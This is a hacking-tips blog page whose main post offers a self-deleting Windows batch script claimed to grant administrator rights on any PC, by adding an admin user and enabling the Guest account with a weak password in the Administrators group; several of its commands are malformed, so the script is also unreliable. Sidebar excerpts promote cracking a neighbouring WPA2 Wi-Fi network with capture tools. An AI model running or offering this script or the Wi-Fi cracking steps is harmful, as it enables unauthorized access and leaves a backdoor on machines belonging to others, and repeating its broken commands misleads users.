Skip to main content

Admin Access For A guest !


Hey Guys!

Want admin privileges on any pc??
try this
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Then double click on it
This will add u in administrators group
Enjoy.
CODE:-

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Comments

Popular posts from this blog

#2 Why Security Is so important

                     Why  Security   ?   It is  Really  a question Every Body Knows How Important Security Is Here is Some Top Reasons Why Security is Most Important     ·         Evolution Of Technologies has focused primarily on ease of use ·         Computer  infrastruture  Management is  becomming  more complex for the common Man ·         Skill Level Required For Exploiting Security  Weakness Is Constantly ·         Direct Impact Of Security Breach on corporate asset base goodwill ·          Increased Networked Environment And Network Based Application

How To Hack Wifi Passwords With Windows 100% Works

How to Crack a Wpa2-Psk Password with Windows :- It,s very common question on the internet to How to hack a Facebook account password and how to hack a WiFi password. Even if you search on YouTube you will find a lots of tutorial to How to hack a WiFi password using backtrack. However, backtrack OS is not most handy OS for normal users. Today i am going to show you how to a crack a Wp2-psk password with windows machine. Software Requirement for this lab :- 1. CommView for Wifi ( Download ) 2.  Elcomsoft Wireless Security Auditor (Download ) Presently i am connected with my own wifi network Virusfound and i want to hack the password of Ultimate that is secured with Wpa2-psk encryption. First you need to be capture the Wpa2, four-way handsake with CommView. Open commView and click on the Start option  then click on the capture option to start the capture now it will show you all available AP , Now click on the Tools > Select the Node Reassoi...

How To Install BT 5 R3 On Virtual Machine Step By Step !

In this tutorial i will show you how to install  Backtrack 5 R3  which is recently  released by offensive security team . if you’ve previously installed backtrack then you might be familiar with  backtrack installations   . its easy and simple just follow given simple steps. Stage 1  Requirements 1 : Download backtrack ISO from  here 2 :  Download  VMware Workstation  or   VMplayer 3 : Install any of above Stage 2 Installation 1 : Create A new virtual machine 2 : choose installer ISO ( choose backtrack 5 ISO )  3 : choose   Linux  as your guest operating system type and  Ubuntu   as version 4 : give a name and location of your backtrack VM 5 : Specify virtual hard drive space ( 20 GB is good enough ) then click finish from ready to create vm window hit enter to go boot screen then choose   d...